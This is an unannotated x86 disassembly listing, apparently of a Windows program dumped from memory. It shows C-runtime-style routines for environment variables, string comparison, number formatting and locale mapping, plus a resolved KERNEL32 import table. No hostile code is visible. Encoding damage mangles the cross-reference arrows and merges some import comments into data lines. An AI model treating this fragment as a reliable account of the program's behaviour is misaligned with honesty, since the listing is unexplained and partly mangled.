push esi
push edi
xor edi, edi
cmp [ebp+arg_0], edi
jz short loc_42014E
push 3Dh
push [ebp+arg_0]
call sub_420330
mov esi, eax
pop ecx
cmp esi, edi
pop ecx
mov [ebp+var_8], esi
jz short loc_42014E
cmp [ebp+arg_0], esi
jz short loc_42014E
mov eax, dword_5158AC
xor ebx, ebx
cmp [esi+1], bl
setz bl
cmp eax, dword_5158B0
jnz short loc_420134
push eax
call sub_4202C9
pop ecx
mov dword_5158AC, eax
loc_420134: ; CODE XREF: sub_4200EA+3C�j
cmp eax, edi
jnz short loc_42018C
cmp [ebp+arg_4], edi
jz short loc_420156
cmp dword_5158B4, edi
jz short loc_420156
call sub_41FAC2
test eax, eax
jz short loc_42018C
loc_42014E: ; CODE XREF: sub_4200EA+D�j
; sub_4200EA+22�j ...
or eax, 0FFFFFFFFh
loc_420151: ; CODE XREF: sub_4200EA+182�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_420156: ; CODE XREF: sub_4200EA+51�j
; sub_4200EA+59�j
cmp ebx, edi
jnz loc_42026A
push 4
call sub_417BEE
cmp eax, edi
pop ecx
mov dword_5158AC, eax
jz short loc_42014E
mov [eax], edi
cmp dword_5158B4, edi
jnz short loc_42018C
push 4
call sub_417BEE
cmp eax, edi
pop ecx
mov dword_5158B4, eax
jz short loc_42014E
mov [eax], edi
loc_42018C: ; CODE XREF: sub_4200EA+4C�j
; sub_4200EA+62�j ...
sub esi, [ebp+arg_0]
mov edi, dword_5158AC
mov [ebp+var_4], edi
push esi
push [ebp+arg_0]
call sub_420271
mov esi, eax
pop ecx
test esi, esi
pop ecx
jl short loc_4201EC
cmp dword ptr [edi], 0
jz short loc_4201EC
test ebx, ebx
jz short loc_4201E4
push dword ptr [edi+esi*4]
lea edi, [edi+esi*4]
call sub_417C62
pop ecx
loc_4201BE: ; CODE XREF: sub_4200EA+E2�j
cmp dword ptr [edi], 0
jz short loc_4201CE
mov eax, [edi+4]
inc esi
mov [edi], eax
add edi, 4
jmp short loc_4201BE
; ---------------------------------------------------------------------------
loc_4201CE: ; CODE XREF: sub_4200EA+D7�j
mov eax, esi
shl eax, 2
push eax
push [ebp+var_4]
call sub_418C3F
pop ecx
test eax, eax
pop ecx
jz short loc_42021E
jmp short loc_420219
; ---------------------------------------------------------------------------
loc_4201E4: ; CODE XREF: sub_4200EA+C6�j
mov eax, [ebp+arg_0]
mov [edi+esi*4], eax
jmp short loc_42021E
; ---------------------------------------------------------------------------
loc_4201EC: ; CODE XREF: sub_4200EA+BD�j
; sub_4200EA+C2�j
test ebx, ebx
jnz short loc_42026A
test esi, esi
jge short loc_4201F6
neg esi
loc_4201F6: ; CODE XREF: sub_4200EA+108�j
lea eax, ds:8[esi*4]
push eax
push edi
call sub_418C3F
pop ecx
test eax, eax
pop ecx
jz loc_42014E
mov ecx, [ebp+arg_0]
mov [eax+esi*4], ecx
and dword ptr [eax+esi*4+4], 0
loc_420219: ; CODE XREF: sub_4200EA+F8�j
mov dword_5158AC, eax
loc_42021E: ; CODE XREF: sub_4200EA+F6�j
; sub_4200EA+100�j
cmp [ebp+arg_4], 0
jz short loc_42026A
push [ebp+arg_0]
call sub_417AF0
inc eax
inc eax
push eax
call sub_417BEE
mov esi, eax
pop ecx
test esi, esi
pop ecx
jz short loc_42026A
push [ebp+arg_0]
push esi
call sub_417A00
mov eax, esi
pop ecx
sub eax, [ebp+arg_0]
pop ecx
add eax, [ebp+var_8]
and byte ptr [eax], 0
inc eax
neg ebx
sbb ebx, ebx
not ebx
and ebx, eax
push ebx
push esi
nop
call near ptr 7C833478h
push esi
call sub_417C62
pop ecx
loc_42026A: ; CODE XREF: sub_4200EA+6E�j
; sub_4200EA+104�j ...
xor eax, eax
jmp loc_420151
sub_4200EA endp
; =============== S U B R O U T I N E =======================================
sub_420271 proc near ; CODE XREF: sub_4200EA+B2�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, dword_5158AC
push edi
mov eax, [esi]
test eax, eax
jz short loc_4202AC
mov edi, [esp+8+arg_4]
loc_420283: ; CODE XREF: sub_420271+39�j
push edi
push eax
push [esp+10h+arg_0]
call sub_41FA83
add esp, 0Ch
test eax, eax
jnz short loc_4202A2
mov eax, [esi]
mov al, [eax+edi]
cmp al, 3Dh
jz short loc_4202BC
test al, al
jz short loc_4202BC
loc_4202A2: ; CODE XREF: sub_420271+22�j
mov eax, [esi+4]
add esi, 4
test eax, eax
jnz short loc_420283
loc_4202AC: ; CODE XREF: sub_420271+C�j
mov eax, esi
sub eax, dword_5158AC
sar eax, 2
neg eax
loc_4202B9: ; CODE XREF: sub_420271+56�j
pop edi
pop esi
retn
; ---------------------------------------------------------------------------
loc_4202BC: ; CODE XREF: sub_420271+2B�j
; sub_420271+2F�j
mov eax, esi
sub eax, dword_5158AC
sar eax, 2
jmp short loc_4202B9
sub_420271 endp
; =============== S U B R O U T I N E =======================================
sub_4202C9 proc near ; CODE XREF: sub_4200EA+3F�p
arg_0 = dword ptr 4
push edi
mov edi, [esp+4+arg_0]
xor ecx, ecx
test edi, edi
jnz short loc_4202D8
xor eax, eax
pop edi
retn
; ---------------------------------------------------------------------------
loc_4202D8: ; CODE XREF: sub_4202C9+9�j
cmp dword ptr [edi], 0
lea eax, [edi+4]
jz short loc_4202EA
loc_4202E0: ; CODE XREF: sub_4202C9+1F�j
mov edx, [eax]
inc ecx
add eax, 4
test edx, edx
jnz short loc_4202E0
loc_4202EA: ; CODE XREF: sub_4202C9+15�j
push ebx
push ebp
lea eax, ds:4[ecx*4]
push esi
push eax
call sub_417BEE
mov esi, eax
pop ecx
test esi, esi
mov ebp, esi
jnz short loc_42030B
push 9
call sub_4191E5
pop ecx
loc_42030B: ; CODE XREF: sub_4202C9+38�j
mov eax, [edi]
mov ebx, edi
loc_42030F: ; CODE XREF: sub_4202C9+5B�j
test eax, eax
jz short loc_420326
push eax
add ebx, 4
call sub_4203A3
mov [esi], eax
mov eax, [ebx]
pop ecx
add esi, 4
jmp short loc_42030F
; ---------------------------------------------------------------------------
loc_420326: ; CODE XREF: sub_4202C9+48�j
and dword ptr [esi], 0
mov eax, ebp
pop esi
pop ebp
pop ebx
pop edi
retn
sub_4202C9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_420330 proc near ; CODE XREF: sub_4200EA+14�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
cmp dword_516C9C, 0
jnz short loc_42034B
push [ebp+arg_4]
push [ebp+arg_0]
call sub_418630
pop ecx
pop ecx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_42034B: ; CODE XREF: sub_420330+A�j
mov ecx, [ebp+arg_0]
loc_42034E: ; CODE XREF: sub_420330+56�j
movzx ax, byte ptr [ecx]
test ax, ax
jz short loc_420391
movzx edx, al
test byte_516DA1[edx], 4
jz short loc_42037D
mov dl, [ecx+1]
inc ecx
test dl, dl
jz short loc_420388
movzx eax, ax
movzx edx, dl
shl eax, 8
or eax, edx
cmp [ebp+arg_4], eax
jz short loc_42038C
jmp short loc_420385
; ---------------------------------------------------------------------------
loc_42037D: ; CODE XREF: sub_420330+31�j
movzx edx, ax
cmp [ebp+arg_4], edx
jz short loc_420391
loc_420385: ; CODE XREF: sub_420330+4B�j
inc ecx
jmp short loc_42034E
; ---------------------------------------------------------------------------
loc_420388: ; CODE XREF: sub_420330+39�j
xor eax, eax
pop ebp
retn
; ---------------------------------------------------------------------------
loc_42038C: ; CODE XREF: sub_420330+49�j
lea eax, [ecx-1]
pop ebp
retn
; ---------------------------------------------------------------------------
loc_420391: ; CODE XREF: sub_420330+25�j
; sub_420330+53�j
movzx edx, ax
mov eax, [ebp+arg_4]
sub eax, edx
neg eax
sbb eax, eax
not eax
and eax, ecx
pop ebp
retn
sub_420330 endp
; =============== S U B R O U T I N E =======================================
sub_4203A3 proc near ; CODE XREF: sub_40A74C+21�p
; sub_4202C9+4E�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jz short loc_4203CA
push esi
call sub_417AF0
inc eax
push eax
call sub_417BEE
pop ecx
test eax, eax
pop ecx
jz short loc_4203CA
push esi
push eax
call sub_417A00
pop ecx
pop ecx
pop esi
retn
; ---------------------------------------------------------------------------
loc_4203CA: ; CODE XREF: sub_4203A3+7�j
; sub_4203A3+1A�j
xor eax, eax
pop esi
retn
sub_4203A3 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_4203D0 proc near ; CODE XREF: sub_405350+159�p
nop
jmp near ptr 71AB4544h
sub_4203D0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_4203D6 proc near ; CODE XREF: ___:0040C171�p
nop
jmp near ptr 77C018BAh
sub_4203D6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_4203DC proc near ; CODE XREF: ___:0040C15A�p
nop
jmp near ptr 77C01A50h
sub_4203DC endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_4203E2 proc near ; CODE XREF: sub_40C127+F�p
nop
jmp near ptr 77C019FFh
sub_4203E2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_4203E8 proc near ; CODE XREF: sub_41D20C+13�p
nop
jmp near ptr 7C937A40h
sub_4203E8 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4203F0 proc near ; CODE XREF: sub_404D78+18A�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push edi
push esi
push ebx
mov esi, [ebp+arg_4]
mov edi, [ebp+arg_0]
lea eax, dword_5158E4
cmp dword ptr [eax+8], 0
jnz short loc_420443
mov al, 0FFh
mov edi, edi
loc_42040C: ; CODE XREF: sub_4203F0+28�j
; sub_4203F0+48�j
or al, al
jz short loc_42043E
mov al, [esi]
inc esi
mov ah, [edi]
inc edi
cmp ah, al
jz short loc_42040C
sub al, 41h
cmp al, 1Ah
sbb cl, cl
and cl, 20h
add al, cl
add al, 41h
xchg ah, al
sub al, 41h
cmp al, 1Ah
sbb cl, cl
and cl, 20h
add al, cl
add al, 41h
cmp al, ah
jz short loc_42040C
sbb al, al
sbb al, 0FFh
loc_42043E: ; CODE XREF: sub_4203F0+1E�j
movsx eax, al
jmp short loc_420477
; ---------------------------------------------------------------------------
loc_420443: ; CODE XREF: sub_4203F0+16�j
mov eax, 0FFh
xor ebx, ebx
mov edi, edi
loc_42044C: ; CODE XREF: sub_4203F0+68�j
; sub_4203F0+80�j
or al, al
jz short loc_420477
mov al, [esi]
inc esi
mov bl, [edi]
inc edi
cmp al, bl
jz short loc_42044C
push eax
push ebx
call sub_4187E1
mov ebx, eax
add esp, 4
call sub_4187E1
add esp, 4
cmp bl, al
jz short loc_42044C
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_420477: ; CODE XREF: sub_4203F0+51�j
; sub_4203F0+5E�j
pop ebx
pop esi
pop edi
leave
retn
sub_4203F0 endp
; =============== S U B R O U T I N E =======================================
sub_42047C proc near ; CODE XREF: sub_409307+E2�p
; sub_409307+F9�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
cmp dword_5158EC, 0
push ebx
jnz short loc_4204C2
mov edx, [esp+4+arg_4]
mov ecx, [esp+4+arg_0]
loc_42048E: ; CODE XREF: sub_42047C+42�j
mov bx, [ecx]
cmp bx, 5Ah
ja short loc_4204A0
cmp bx, 41h
jb short loc_4204A0
add ebx, 20h
loc_4204A0: ; CODE XREF: sub_42047C+19�j
; sub_42047C+1F�j
mov ax, [edx]
cmp ax, 5Ah
ja short loc_4204B2
cmp ax, 41h
jb short loc_4204B2
add eax, 20h
loc_4204B2: ; CODE XREF: sub_42047C+2B�j
; sub_42047C+31�j
inc ecx
inc ecx
inc edx
inc edx
test bx, bx
jz short loc_4204F2
cmp bx, ax
jz short loc_42048E
jmp short loc_4204F2
; ---------------------------------------------------------------------------
loc_4204C2: ; CODE XREF: sub_42047C+8�j
push esi
mov esi, [esp+8+arg_0]
push edi
mov edi, [esp+0Ch+arg_4]
loc_4204CC: ; CODE XREF: sub_42047C+72�j
mov ax, [esi]
inc esi
push eax
inc esi
call sub_420585
mov ebx, eax
mov ax, [edi]
inc edi
push eax
inc edi
call sub_420585
pop ecx
test bx, bx
pop ecx
jz short loc_4204F0
cmp bx, ax
jz short loc_4204CC
loc_4204F0: ; CODE XREF: sub_42047C+6D�j
pop edi
pop esi
loc_4204F2: ; CODE XREF: sub_42047C+3D�j
; sub_42047C+44�j
movzx ecx, ax
movzx eax, bx
sub eax, ecx
pop ebx
retn
sub_42047C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4204FC proc near ; CODE XREF: ___:004161A4�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
cmp [ebp+arg_8], 0Ah
jnz short loc_420511
cmp [ebp+arg_0], 0
jge short loc_420511
push 1
push 0Ah
jmp short loc_420516
; ---------------------------------------------------------------------------
loc_420511: ; CODE XREF: sub_4204FC+7�j
; sub_4204FC+D�j
push 0
push [ebp+arg_8]
loc_420516: ; CODE XREF: sub_4204FC+13�j
push [ebp+arg_4]
push [ebp+arg_0]
call sub_420529
mov eax, [ebp+arg_4]
add esp, 10h
pop ebp
retn
sub_4204FC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_420529 proc near ; CODE XREF: sub_4204FC+20�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
cmp [ebp+arg_C], 0
mov ecx, [ebp+arg_4]
push ebx
push esi
push edi
jz short loc_420543
mov esi, [ebp+arg_0]
mov byte ptr [ecx], 2Dh
inc ecx
neg esi
jmp short loc_420546
; ---------------------------------------------------------------------------
loc_420543: ; CODE XREF: sub_420529+D�j
mov esi, [ebp+arg_0]
loc_420546: ; CODE XREF: sub_420529+18�j
mov edi, ecx
loc_420548: ; CODE XREF: sub_420529+43�j
mov eax, esi
xor edx, edx
div [ebp+arg_8]
mov eax, esi
mov ebx, edx
xor edx, edx
div [ebp+arg_8]
cmp ebx, 9
mov esi, eax
jbe short loc_420564
add bl, 57h
jmp short loc_420567
; ---------------------------------------------------------------------------
loc_420564: ; CODE XREF: sub_420529+34�j
add bl, 30h
loc_420567: ; CODE XREF: sub_420529+39�j
mov [ecx], bl
inc ecx
test esi, esi
ja short loc_420548
and byte ptr [ecx], 0
dec ecx
loc_420572: ; CODE XREF: sub_420529+55�j
mov dl, [edi]
mov al, [ecx]
mov [ecx], dl
mov [edi], al
dec ecx
inc edi
cmp edi, ecx
jb short loc_420572
pop edi
pop esi
pop ebx
pop ebp
retn
sub_420529 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_420585 proc near ; CODE XREF: sub_42047C+56�p
; sub_42047C+63�p
var_2 = word ptr -2
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
cmp ax, 0FFFFh
jnz short loc_420597
or ax, ax
leave
retn
; ---------------------------------------------------------------------------
loc_420597: ; CODE XREF: sub_420585+B�j
cmp dword_5158EC, 0
jnz short loc_4205B1
cmp ax, 41h
jb short locret_4205F8
cmp ax, 5Ah
ja short locret_4205F8
add eax, 20h
leave
retn
; ---------------------------------------------------------------------------
loc_4205B1: ; CODE XREF: sub_420585+19�j
cmp ax, 100h
jnb short loc_4205CB
push 1
push eax
call sub_420833
pop ecx
test eax, eax
pop ecx
jnz short loc_4205CB
mov ax, word ptr [ebp+arg_0]
leave
retn
; ---------------------------------------------------------------------------
loc_4205CB: ; CODE XREF: sub_420585+30�j
; sub_420585+3E�j
push 0
lea eax, [ebp+var_2]
push 1
push eax
lea eax, [ebp+arg_0]
push 1
push eax
push 100h
push dword_5158EC
call sub_4205FA
add esp, 1Ch
test eax, eax
mov ax, word ptr [ebp+arg_0]
jz short locret_4205F8
mov ax, [ebp+var_2]
locret_4205F8: ; CODE XREF: sub_420585+1F�j
; sub_420585+25�j ...
leave
retn
sub_420585 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4205FA proc near ; CODE XREF: sub_420585+5F�p
var_2C = dword ptr -2Ch
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_421AB8
push offset sub_41D304
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 1Ch
push ebx
push esi
push edi
mov [ebp+var_18], esp
xor esi, esi
cmp dword_515B44, esi
jnz short loc_420670
push esi
push esi
push 1
pop ebx
push ebx
push offset dword_4216A0
mov edi, 100h
push edi
push esi
nop
call near ptr 7C80CCA8h
test eax, eax
jz short loc_42064E
mov dword_515B44, ebx
jmp short loc_420670
; ---------------------------------------------------------------------------
loc_42064E: ; CODE XREF: sub_4205FA+4A�j
push esi
push esi
push ebx
push offset dword_441700
push edi
push esi
nop
call near ptr 7C838DE8h
test eax, eax
jz loc_4207EF
mov dword_515B44, 2
loc_420670: ; CODE XREF: sub_4205FA+2E�j
; sub_4205FA+52�j
cmp [ebp+arg_C], esi
jle short loc_420685
push [ebp+arg_C]
push [ebp+arg_8]
call sub_420803
pop ecx
pop ecx
mov [ebp+arg_C], eax
loc_420685: ; CODE XREF: sub_4205FA+79�j
mov eax, dword_515B44
cmp eax, 1
jnz short loc_4206AC
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
nop
call near ptr 7C80CCA8h
jmp loc_4207F1
; ---------------------------------------------------------------------------
loc_4206AC: ; CODE XREF: sub_4205FA+93�j
cmp eax, 2
jnz loc_4207EF
cmp [ebp+arg_18], esi
jnz short loc_4206C2
mov eax, dword_5158FC
mov [ebp+arg_18], eax
loc_4206C2: ; CODE XREF: sub_4205FA+BE�j
push esi
push esi
push esi
push esi
push [ebp+arg_C]
push [ebp+arg_8]
push 220h
push [ebp+arg_18]
nop
call near ptr 7C80A0D4h
mov [ebp+var_20], eax
cmp eax, esi
jz loc_4207EF
mov [ebp+var_4], esi
add eax, 3
and al, 0FCh
call sub_417B70
mov [ebp+var_18], esp
mov eax, esp
mov [ebp+var_1C], eax
jmp short loc_420708
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor esi, esi
mov [ebp+var_1C], esi
loc_420708: ; CODE XREF: sub_4205FA+100�j
or [ebp+var_4], 0FFFFFFFFh
cmp [ebp+var_1C], esi
jz loc_4207EF
push esi
push esi
push [ebp+var_20]
push [ebp+var_1C]
push [ebp+arg_C]
push [ebp+arg_8]
push 220h
push [ebp+arg_18]
nop
call near ptr 7C80A0D4h
test eax, eax
jz loc_4207EF
push esi
push esi
push [ebp+var_20]
push [ebp+var_1C]
push [ebp+arg_4]
push [ebp+arg_0]
nop
call near ptr 7C838DE8h
mov edi, eax
mov [ebp+var_2C], edi
cmp edi, esi
jz loc_4207EF
mov [ebp+var_4], 1
add eax, 3
and al, 0FCh
call sub_417B70
mov [ebp+var_18], esp
mov ebx, esp
mov [ebp+var_24], ebx
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_42078B
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor esi, esi
xor ebx, ebx
or [ebp+var_4], 0FFFFFFFFh
mov edi, [ebp+var_2C]
loc_42078B: ; CODE XREF: sub_4205FA+17D�j
cmp ebx, esi
jz short loc_4207EF
push edi
push ebx
push [ebp+var_20]
push [ebp+var_1C]
push [ebp+arg_4]
push [ebp+arg_0]
nop
call near ptr 7C838DE8h
test eax, eax
jz short loc_4207EF
test byte ptr [ebp+arg_4+1], 4
jz short loc_4207C9
mov eax, [ebp+arg_14]
cmp eax, esi
jz short loc_4207EB
cmp eax, edi
jl short loc_4207BA
mov eax, edi
loc_4207BA: ; CODE XREF: sub_4205FA+1BC�j
push eax
push ebx
push [ebp+arg_10]
call sub_4182F0
add esp, 0Ch
jmp short loc_4207EB
; ---------------------------------------------------------------------------
loc_4207C9: ; CODE XREF: sub_4205FA+1B1�j
cmp [ebp+arg_14], esi
jnz short loc_4207D2
push esi
push esi
jmp short loc_4207D8
; ---------------------------------------------------------------------------
loc_4207D2: ; CODE XREF: sub_4205FA+1D2�j
push [ebp+arg_14]
push [ebp+arg_10]
loc_4207D8: ; CODE XREF: sub_4205FA+1D6�j
push edi
push ebx
push 1
push [ebp+arg_18]
nop
call near ptr 7C809BF8h
mov edi, eax
cmp edi, esi
jz short loc_4207EF
loc_4207EB: ; CODE XREF: sub_4205FA+1B8�j
; sub_4205FA+1CD�j
mov eax, edi
jmp short loc_4207F1
; ---------------------------------------------------------------------------
loc_4207EF: ; CODE XREF: sub_4205FA+66�j
; sub_4205FA+B5�j ...
xor eax, eax
loc_4207F1: ; CODE XREF: sub_4205FA+AD�j
; sub_4205FA+1F3�j
lea esp, [ebp-38h]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_4205FA endp
; =============== S U B R O U T I N E =======================================
sub_420803 proc near ; CODE XREF: sub_4205FA+81�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_4]
mov eax, [esp+arg_0]
test edx, edx
push esi
lea ecx, [edx-1]
jz short loc_420822
loc_420813: ; CODE XREF: sub_420803+1D�j
cmp word ptr [eax], 0
jz short loc_420822
inc eax
mov esi, ecx
inc eax
dec ecx
test esi, esi
jnz short loc_420813
loc_420822: ; CODE XREF: sub_420803+E�j
; sub_420803+14�j
cmp word ptr [eax], 0
pop esi
jnz short loc_420830
sub eax, [esp+arg_0]
sar eax, 1
retn
; ---------------------------------------------------------------------------
loc_420830: ; CODE XREF: sub_420803+24�j
mov eax, edx
retn
sub_420803 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_420833 proc near ; CODE XREF: sub_420585+35�p
var_4 = dword ptr -4
arg_0 = word ptr 8
arg_4 = word ptr 0Ch
push ebp
mov ebp, esp
push ecx
cmp [ebp+arg_0], 0FFFFh
jz short loc_420873
cmp [ebp+arg_0], 100h
jnb short loc_420857
movzx eax, [ebp+arg_0]
mov ecx, off_43B5A4
mov ax, [ecx+eax*2]
jmp short loc_42087A
; ---------------------------------------------------------------------------
loc_420857: ; CODE XREF: sub_420833+12�j
push 0
lea eax, [ebp+var_4]
push 0
push eax
lea eax, [ebp+arg_0]
push 1
push eax
push 1
call sub_420885
add esp, 18h
test eax, eax
jnz short loc_420877
loc_420873: ; CODE XREF: sub_420833+A�j
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_420877: ; CODE XREF: sub_420833+3E�j
mov eax, [ebp+var_4]
loc_42087A: ; CODE XREF: sub_420833+22�j
movzx ecx, [ebp+arg_4]
movzx eax, ax
and eax, ecx
leave
retn
sub_420833 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_420885 proc near ; CODE XREF: sub_420833+34�p
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_421AD0
push offset sub_41D304
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 1Ch
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov eax, dword_515B48
xor edi, edi
cmp eax, edi
jnz short loc_4208F4
lea eax, [ebp+var_1C]
push eax
push 1
pop esi
push esi
push offset dword_4216A0
push esi
nop
call near ptr 7C80A490h
test eax, eax
jz short loc_4208D2
mov eax, esi
jmp short loc_4208EF
; ---------------------------------------------------------------------------
loc_4208D2: ; CODE XREF: sub_420885+47�j
lea eax, [ebp+var_1C]
push eax
push esi
push offset dword_441700
push esi
push edi
nop
call near ptr 7C838A0Ch
test eax, eax
jz loc_420A36
push 2
pop eax
loc_4208EF: ; CODE XREF: sub_420885+4B�j
mov dword_515B48, eax
loc_4208F4: ; CODE XREF: sub_420885+2F�j
cmp eax, 1
jnz short loc_420910
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
nop
call near ptr 7C80A490h
jmp loc_420A38
; ---------------------------------------------------------------------------
loc_420910: ; CODE XREF: sub_420885+72�j
cmp eax, 2
jnz loc_420A36
cmp [ebp+arg_10], edi
jnz short loc_420926
mov eax, dword_5158FC
mov [ebp+arg_10], eax
loc_420926: ; CODE XREF: sub_420885+97�j
push edi
push edi
push edi
push edi
push [ebp+arg_8]
push [ebp+arg_4]
push 220h
push [ebp+arg_10]
nop
call near ptr 7C80A0D4h
mov esi, eax
mov [ebp+var_28], esi
cmp esi, edi
jz loc_420A36
mov [ebp+var_4], edi
add eax, 3
and al, 0FCh
call sub_417B70
mov [ebp+var_18], esp
mov eax, esp
mov [ebp+var_2C], eax
push esi
push edi
push eax
call sub_417430
add esp, 0Ch
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_420984
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor edi, edi
mov [ebp+var_2C], edi
or [ebp+var_4], 0FFFFFFFFh
mov esi, [ebp+var_28]
loc_420984: ; CODE XREF: sub_420885+EA�j
cmp [ebp+var_2C], edi
jz loc_420A36
push edi
push edi
push esi
push [ebp+var_2C]
push [ebp+arg_8]
push [ebp+arg_4]
push 220h
push [ebp+arg_10]
nop
call near ptr 7C80A0D4h
test eax, eax
jz loc_420A36
mov [ebp+var_4], 1
lea eax, [esi+esi+2]
add eax, 3
and al, 0FCh
call sub_417B70
mov [ebp+var_18], esp
mov ebx, esp
mov [ebp+var_24], ebx
jmp short loc_4209D9
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor edi, edi
xor ebx, ebx
loc_4209D9: ; CODE XREF: sub_420885+147�j
or [ebp+var_4], 0FFFFFFFFh
cmp ebx, edi
jz short loc_420A36
mov eax, [ebp+arg_14]
cmp eax, edi
jnz short loc_4209ED
mov eax, dword_5158EC
loc_4209ED: ; CODE XREF: sub_420885+161�j
mov ecx, [ebp+arg_8]
lea edi, [ecx+ecx]
lea esi, [edi+ebx]
or word ptr [esi], 0FFFFh
or word ptr [esi-2], 0FFFFh
push ebx
push [ebp+var_28]
push [ebp+var_2C]
push [ebp+arg_0]
push eax
nop
call near ptr 7C838A0Ch
mov [ebp+var_20], eax
cmp word ptr [esi-2], 0FFFFh
jz short loc_420A36
cmp word ptr [esi], 0FFFFh
jnz short loc_420A36
push edi
push ebx
push [ebp+arg_C]
call sub_41D840
add esp, 0Ch
mov eax, [ebp+var_20]
jmp short loc_420A38
; ---------------------------------------------------------------------------
loc_420A36: ; CODE XREF: sub_420885+61�j
; sub_420885+8E�j ...
xor eax, eax
loc_420A38: ; CODE XREF: sub_420885+86�j
; sub_420885+1AF�j
lea esp, [ebp-38h]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_420885 endp
; ---------------------------------------------------------------------------
align 4
dd 16Dh dup(0)
dd 7C80B974h, 7C833478h, 7C80A35Eh, 7C80D077h, 7C832044h
dd 7C812641h, 7C81DC03h, 7C80A490h, 7C838A0Ch, 7C937A40h
dd 7C810E51h, 7C812F39h, 7C80CC97h
dword_421034 dd 7C812F08h ; resolved to->KERNEL32.GetEnvironmentStringsW dd 7C81CF5Bh, 7C814AE7h, 7C81DF77h, 7C862E2Ah, 7C8127A7h
dd 7C809915h, 7C812E76h, 7C80CCA8h, 7C838DE8h, 7C809A51h
dd 7C80C058h
dword_421064 dd 7C80929Ch ; resolved to->KERNEL32.GetTickCount ; sub_401D79+3D�r ...
dd 7C80A427h, 7C82FA46h
dword_421070 dd 7C802442h ; resolved to->KERNEL32.Sleep ; sub_4078E6+D1�r ...
dword_421074 dd 7C809BF8h ; resolved to->KERNEL32.MultiByteToWideChar ; sub_417CAE+54�r ...
dd 7C80180Eh
dword_42107C dd 7C809B47h ; resolved to->KERNEL32.CloseHandle ; sub_40B7FD+6�r ...
dd 7C810D87h, 7C8312E5h
dword_421088 dd 7C801A24h ; resolved to->KERNEL32.CreateFileA dd 7C80B4CFh, 7C83632Dh, 7C8361EEh, 7C910331h
dword_42109C dd 7C810637h ; resolved to->KERNEL32.CreateThread dd 7C810A77h, 7C81153Ch, 7C80EDD7h, 7C80E7ECh, 7C80E866h
dd 7C834EB1h
dword_4210B8 dd 7C8137D9h ; resolved to->KERNEL32.FindFirstFileA dd 7C810B8Eh, 7C9010EDh, 7C901005h, 7C80B829h, 7C91188Ah
dd 7C80ABDEh
dword_4210D4 dd 7C80F0F4h ; resolved to->KERNEL32.GetEnvironmentVariableWdword_4210D8 dd 7C80ADA0h ; resolved to->KERNEL32.GetProcAddress ; sub_409794+11�r ...
